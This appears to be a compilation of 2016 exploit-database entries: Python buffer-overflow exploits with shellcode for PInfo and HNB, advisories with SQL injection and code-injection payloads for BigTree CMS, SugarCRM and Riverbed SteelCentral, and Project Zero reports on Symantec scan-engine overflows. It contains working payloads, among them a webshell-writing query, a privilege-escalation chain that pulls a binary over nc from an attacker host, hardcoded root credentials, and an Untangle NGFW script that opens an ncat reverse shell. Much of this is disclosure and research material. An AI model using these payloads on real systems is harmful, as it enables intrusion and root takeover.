import os, subprocess
def run():
try:
print "# PInfo File Viewer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 564
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["pinfo -m",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, PInfo File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit PInfo 0.6.9-5.1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
1. ADVISORY INFORMATION
========================================
Title: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Application: BigTree CMS
Remotely Exploitable: Yes
Versions Affected: < 4.2.11
Vendor URL: https://www.bigtreecms.org
Bugs: SQL Injection
Author: Mehmet Ince
Date of found: 27 Jun 2016
2. CREDIT
========================================
Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS.
Netsparker was used for initial detection.
3. DETAILS
========================================
Following codes shows $page variable is used at inside SQL query without
proper escaping nor PDO.
File : /core/inc/bigtree/admin.php
Lines 6866 - 6879
function submitPageChange($page,$changes) {
if ($page[0] == "p") {
// It's still pending...
$type = "NEW";
$pending = true;
$existing_page = array();
$existing_pending_change = array("id" => substr($page,1));
} else {
// It's an existing page
$type = "EDIT";
$pending = false;
$existing_page = BigTreeCMS::getPage($page);
$existing_pending_change = sqlfetch(sqlquery("SELECT id FROM
bigtree_pending_changes WHERE `table` = 'bigtree_pages' AND item_id =
'$page'"));
}
...
}
Basically submitPageChange function is vulnerable against SQL Injection
vulnerability. This function was used twice during development. Following
list shows location of these function callers.
/core/admin/modules/pages/front-end-update.php
/core/admin/modules/pages/update.php
PoC:
Following HTTP POST request was used in order to exploit the SQL Injection
flaw.
POST /site/index.php/admin/pages/update/ HTTP/1.1
Cache-Control: no-cache
Referer: http://10.0.0.154/site/index.php/admin/pages/edit/2/
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=amsscser3eg7fkljpjjt78ki17; hide_bigtree_bar=;
bigtree_admin[email]=mehmet%40mehmetince.net;
bigtree_admin[login]=%5B%22session-5770eca81c6d86.91986415%22%2C%22chain-5770ec71e2d7d3.28696204%22%5D;
PHPSESSID=lsrbe949jc3na5j1sof19a3s53
Host: 10.0.0.154
Accept-Encoding: gzip, deflate
Content-Length: 2248
Content-Type: multipart/form-data; boundary=b788b047b8e345b792cdc1f81fef2106
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="_bigtree_post_check"
success
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="page"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="nav_title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="title"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="publish_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="expire_at"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="in_nav"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="redirect_lower"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="trunk"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="external"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="new_window"
Yes
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="resources[page_header]"
The Trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="tag_entry"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="route"
trees
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="seo_invisible"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="ptype"
Save
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="max_age"
3
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="template"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_keywords"
--b788b047b8e345b792cdc1f81fef2106
Content-Disposition: form-data; name="meta_description"
--b788b047b8e345b792cdc1f81fef2106--
4. TIMELINE
========================================
27 Jun 2016 - Netsparker identified SQL Injection.
27 Jun 2016 - Source code review and finding root cause of SQLi.
27 Jun 2016 - Issue resolved by PRODAFT / INVICTUS team.
27 Jun 2016 - Pull Request has been sended.
https://github.com/bigtreecms/BigTree-CMS/pull/256
--
Sr. Information Security Engineer
https://www.mehmetince.net
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: HNB - Organizer
# Version: 1.9.18-10
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Hnb is an ncurses program to organize many
kinds of data in one place, for
# example addresses, todo lists, ideas, book reviews or to store snippets of
# brainstorming.
# Kali Linux 2.0 package: pool/main/h/hnb/hnb_1.9.18-10_i386.deb
# MD5sum: 1e1ff680f6e94a1a28ca85eeb3ea6aa0
# Website:http://hnb.sourceforge.net/
#
# gdb$ run -rc `python -c 'print "A"*108'`
# Starting program: /usr/bin/hnb -rc `python -c 'print "A"*108'`
# *** buffer overflow detected ***: /usr/bin/hnb terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7e14773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7ea4b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb7ea2c3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7ea2127]
# /usr/bin/hnb[0x8049669]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb7dc1a63]
# /usr/bin/hnb[0x804a2d9]
# ======= Memory map: ========
# 08048000-0806e000 r-xp 00000000 08:01 2253992 /usr/bin/hnb
# 0806e000-0806f000 r--p 00025000 08:01 2253992 /usr/bin/hnb
# 0806f000-08070000 rw-p 00026000 08:01 2253992 /usr/bin/hnb
# 08070000-080b1000 rw-p 00000000 00:00 0 [heap]
import os, subprocess
def run():
try:
print "# HNB Organizer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 108
nopsled = "\x90"*40
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["hnb -rc",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, HNB File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit HNB 1.9.18-10 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------
[-] Software Link:
http://www.sugarcrm.com/
[-] Affected Versions:
Version 6.5.18 CE and prior versions.
[-] Vulnerabilities Description:
1) The vulnerable code is located in the /include/utils/array_utils.php script:
99. function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
100. if (is_array($value)) {
101. $str = '';
102. $newArrayName = $array_name . "['$value_name']";
103. foreach($value as $key=>$val) {
104. $str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
105. }
106. return $str;
107. } else {
108. if(!$save_empty && empty($value)){
109. return;
110. }else{
111. return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
112. }
113. }
114. }
The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:
http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1
2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script:
117. $manifest_file = extractManifest($tempFile);
118.
119. if(is_file($manifest_file)) {
120. require_once( $manifest_file );
The vulnerability is caused by the Upgrade Wizard module, which allows to upload a package with an arbitrary manifest.php
file that will be executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.
[-] Solution:
Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.
[-] Disclosure Timeline:
[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-05
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7
PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘username’ POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the application’s
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.
The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the ‘users’
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).
[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {
"username": "test%';INSERT INTO users (username, password, uid) VALUES
(<user>, <SHA512 hash>, <random id>);--",
"password": ""
}
Additional SQL Injection vulnerabilities exist in the application’s web
interface and can be exploited after authentication.
Method => GET
URL => /popup.php?page=export_report
Parameter => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => GET
URL => /popup.php?page=algorithm_settings
Parameter => id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND
('Pdyu'='Pdyu
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--
All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.
[POC SQL INJECTION - WRITE WEBSHELL]
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3
==Command Injection==
Multiple command injection vulnerabilities exist in the appliances’ web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.
URL => GET
/popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter => device
POC Payload => 1; touch /tmp/FILE;
URL => POST /index.php?page=licenses
Body => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes => Token Request functionality in 'Licenses' page
URL => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter => query
POC Payload => 1; touch /tmp/MYFILE;
URL => POST /index.php?page=network_config
Body => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Configure now' functionality, injection occurs after
appliance reboots.
URL => POST /index.php?page=product_info
Body => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Delete collected entry' functionality
==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The ‘apache’ user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:
/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*
The ‘mazu-run’ script can be used to invoke the /bin/date binary in the
context of the built-in ‘mazu’ user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the –f flag against a sensitive
file such as the root private SSH key. The ‘–f’ option instructs the
‘date’ binary to parse the file specified as a DATEFILE. By default, the
command ‘date’ will echo back an error message with the contents of the
specified file when this does not comply with a valid DATEFILE format.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish a SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.
[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
-o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';
==Local File Inclusion==
A local file inclusion vulnerability exists in the
‘sensor/ta_loader.php’ file due to a lack of input sanization for the
GET parameter ‘class’. This allows an attacker to read or include
arbitrary files.
As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the ‘Edit
/etc/hosts’ functionality available under
‘/index.php?page=network_config’ to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.
[POC LFI]
curl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts
==Account Hijacking==
The password change functionality under the
‘/index.php?page=security_compliance’ page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the ‘accountscredentialsid’ hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.
This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out on client-side against the
‘oldpassword’ field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length. Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the ‘oldpassword’ hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.
After clicking the ‘Configure Now’ button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.
==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.
Users => mazu, dhcp, root
Password => bb!nmp4y
The default ‘mazu’ user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.
+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.
At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter ‘originalsettingsid’ when
browsing to ‘/index.php?page=security_compliance’.
+------------+
| Timeline |
+------------+
24/03/2016 – Initial disclosure to Riverbed.
25/03/2016 – Vendor confirms receipt of advisory.
18/04/2016 – Sent follow up email asking for a status update
19/04/2016 – Vendor replies engineering team is working on software patches.
13/06/2016 – Vendor releases patched software build.
27/06/2016 – Public Disclosure
+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
#!/usr/bin/python
# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE: (Not yet assigned)
# Discovery: Matt Bush (@3xocyte)
# Exploit: Matt Bush
# Contact: mbush@themissinglink.com.au
# Disclosure Timeline:
# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016 US-CERT confirms contacting vendor
# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016 Public disclosure
# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
import json, requests, sys
if len(sys.argv) < 5:
print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
sys.exit()
print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
print " by @3xocyte\n"
rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}
print "[*] Opening session..."
session = requests.Session()
print "[*] Authenticating..."
try:
login = session.post(login_url, data=auth)
get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
data = json.loads(req_nonce.text)
nonce = data['result']
except:
print "[!] Authentication failed. Quitting."
sys.exit()
print "[*] Getting execManager objectID..."
try:
get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
data = json.loads(req_obj_id.text)
object_id = data['result']['execManager']['objectID']
except:
print "[!] Could not get execManager objectID. Quitting."
sys.exit()
print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
try:
exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
session.post(rpc_url, data=json.dumps(exploit))
except:
print "[!] Exploit failed. Quitting."
sys.exit()
print "[*] Exploit sent!"
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814
The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.
.text:00023D91 31 C0 xor eax, eax
...
.text:00023DAE 8D 95 E4 FB FF+ lea edx, [ebp+var_41C]
.text:00023DB4 89 D7 mov edi, edx
.text:00023DC7 66 B9 00 01 mov cx, 100h
.text:00023DCB F3 AB rep stosd
We can see from this initialization that var_141C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:
.text:0002442C 88 0C 10 mov [eax+edx], cl ; eax = &var_41C edx=index
.text:0002442F 83 C2 01 add edx, 1 ; edx++
...
.text:00024408 81 FA 00 10 00+ cmp edx, 1000h ; if (index > 4096) ...
.text:0002440E 0F 84 E9 02 00+ jz loc_246FD ; oob
The index is checked to see if it's > 4096 bytes, this is incorrect. This is most likely a simple programmers error, bounds checking with the wrong size.
This code is typically run with SYSTEM/root privileges, I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
#0 0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
#1 0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
#2 0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
#3 0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
#4 0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#5 0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.
This issue is remotely exploitable just by receiving an email, visiting a website, and so on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40032.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=810
A major component of the Symantec Antivirus scan engine is the "Decomposer", responsible for unpacking various archive formats such as ZIP, RAR, and so on. The decomposer runs as NT AUTHORITY\SYSTEM on Windows, and root on Linux and Mac. It is self-evident from looking at the decomposer code that Symantec have based the RAR decompression on the open-source unrar package from RAR labs (Note: this is permitted by the unrar license).
By comparing Symantec's code to the open source code, I have determined that Symantec are probably using version 4.1.4 of the unrar code, released in January 2012. The most current version is version 5.3.11.
Between the version of unrar that Symantec runs as NT AUTHORITY\SYSTEM to unpack untrusted binaries received over the network and the the current version, literally hundreds of critical memory corruption bugs have been resolved.
I have verified that multiple publicly known vulnerabilities affect Symantec, and can result in remote code execution as NT AUTHORTITY\SYSTEM on Windows and root on Linux and Mac.
I have verified this on the following products:
Norton Antivirus, Windows
Symantec Endpoint Protection, Linux and Windows
Symantec Scan Engine, Linux and Windows
Presumably this affects all other Symantec products using the core Symantec scan engine.
In my opinion, I'm being exceptionally generous considering this issue a new vulnerability and not public information. Frankly, it is astonishing that Symantec do not track new releases of third party code they use. I think you should take this opportunity to check all other third party code you're using to verify you haven't fallen behind.
I've attached a trivial example that modifies an arbitrary index in the PlaceA[] array via Unpack::ShortLZ().
(534.adc): Access violation - code c0000005 (!!! second chance !!!)
eax=14858d00 ebx=07da63e0 ecx=07da65ec edx=fb6e43a0 esi=07da6370 edi=daf72217
eip=6d7b4016 esp=0da8d260 ebp=0da8d27c iopl=0 nv up ei ng nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
ccScanw!filelengthi64+0x470b6:
6d7b4016 8994be005d0000 mov dword ptr [esi+edi*4+5D00h],edx ds:002b:73b748cc=14858d00
0:052> lm v mccScanw
start end module name
6d690000 6d8bf000 ccScanw (export symbols) C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Loaded symbol image file: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image path: C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\ccScanw.dll
Image name: ccScanw.dll
Timestamp: Tue Jan 26 13:51:55 2016 (56A7EA7B)
CheckSum: 0022B3ED
ImageSize: 0022F000
File version: 13.1.2.19
Product version: 13.1.2.19
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40031.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=818
Symantec attempts to clean or remove components from archives or other multipart containers that they detect as malicious. The code that they use to remove components from MIME encoded messages in CMIMEParser::UpdateHeader() assumes that filenames cannot be longer than 77 characters.
This assumption is obviously incorrect, names can be any length, resulting in a very clean heap overflow.
The heap overflow occurs because Symantec does the cleaning in multiple stages, first changing the Content-Type to "text/plain", then changing the filename to "DELETED.TXT". The problem is that during the first stage of this process, they maintain the existing name but use a buffer prepared for the final name.
Something like:
char *buf = malloc(strlen(NewContentType) + strlen(LengthOfNewEncodedFilename) + 100)
// First change the content-type
strcpy(buf, "Content-Type: ");
strcpy(buf, NewContentType;
strcpy(buf, "; name=\"");
strcpy(buf, OldFileName);
...
UpdateName(buf, NewFileName);
...
This obviously won't work, because it doesn't verify that the old name will fit. I've attached an example MIME message that triggers this code in Symantec Scan Engine.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40034.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=819
Simple fuzzing found an integer overflow in the dec2tnef library. This allocation from Attachment::setDataFromAttachment() doesn't verify that the attacker controlled value doesn't wrap:
.text:000227B8 8D 42 01 lea eax, [edx+1]
.text:000227BB 89 85 68 FF FF+ mov [ebp+var_98], eax
.text:000227C1 8B 83 CC FF FF+ mov eax, ds:(_ZSt7nothrow_ptr - 42CFCh)[ebx]
.text:000227C7 89 44 24 04 mov [esp+4], eax
.text:000227CB 8B 85 68 FF FF+ mov eax, [ebp+var_98]
.text:000227D1 C1 E0 02 shl eax, 2
.text:000227D4 89 04 24 mov [esp], eax
.text:000227D7 89 95 5C FF FF+ mov [ebp+src], edx
.text:000227DD 89 8D 58 FF FF+ mov [ebp+var_A8], ecx
.text:000227E3 E8 54 22 FE FF call __ZnajRKSt9nothrow_t ; operator new[](uint,std::nothrow_t const&)
That's (count + 1) * 4, without any checking that will succeed. The attached testcase reaches this code on Symantec Scan Engine, I'm not sure which other products use this code.
(gdb) bt
#1 0x07e88816 in Attachment::setDataFromAttachment(Item&) () from definitions/Decomposer/libdec2tnef.so
#2 0x07e88abc in Attachment::setAttribute(Item&) () from definitions/Decomposer/libdec2tnef.so
#3 0x07e8a1b4 in TNEFObject::getAttachments(_IO_FILE*, MList&) () from definitions/Decomposer/libdec2tnef.so
#4 0x07e6c1d6 in CTNEFArchive::Open(char const*) () from definitions/Decomposer/libdec2tnef.so
#5 0x07e6ae5f in CTNEFEngine::OpenArchive(CTNEFArchive*, bool*) () from definitions/Decomposer/libdec2tnef.so
#6 0x07e6b8c0 in CTNEFEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from definitions/Decomposer/libdec2tnef.so
#7 0x063d07b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
